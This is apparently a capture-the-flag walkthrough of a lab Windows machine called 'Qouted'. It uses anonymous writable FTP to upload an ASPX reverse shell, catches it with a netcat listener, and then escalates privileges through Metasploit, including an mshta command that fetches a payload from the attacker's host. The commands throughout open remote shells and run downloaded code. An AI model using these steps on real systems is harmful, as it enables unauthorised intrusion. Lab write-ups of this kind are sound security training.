Qouted
We will download the machine and configure its network as we did in DC01.
Enumeration:
The first thing we will do is to find the IP of that target machine to proceed, and since its a windows machine we can perform SMB Sweep:
ifconfignetexec smb 10.0.2.0/24
Now we will run nmap scan:
nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv -Pn 10.0.2.36
As nmap told us that anonymous login is allowed on ftp, lets authenticate to the ftp server:
ftp 10.0.2.36
anonymous
Lets try if we can upload something to here:
echo "1" > test.txt
And we can upload to the ftp using put command:
put test.txt
As we can see we have write access to this ftp.
Lets try to access the file we uploaded through the browser:
We can access it.
Exploitation:
Lets upload an aspx file to get a reverse shell:
We will use the reverse shell from this website:
https://raw.githubusercontent.com/borjmz/aspx-reverse-shell/refs/heads/master/shell.aspx
put shell.aspx
Set up a netcat listener and go to this file in the browser:
rlwrap nc -nlvp 443
As we can see it is hanging which means it is waiting for something to be done, which is our shell:
Post-Exploitation:
If we check our privileges:
whoami /priv
We will see that we have SeImpersonatePrivilege, we can use metasploit to escalate our privileges:
search hta_server
Configure the options:
Run it:
exploit
Now lets get a meterepreter shell:
mshta.exe http://10.0.2.35:8080/6vUn5uGTkLnGPc.hta
Lets try to search for exploits:
search suggester
Metasploit shows that there is several attacks we can try to exploit:
And we will use the reflection juicy one:
And here is the root flag, you can find the users flag in the quoted desktop.
Last updated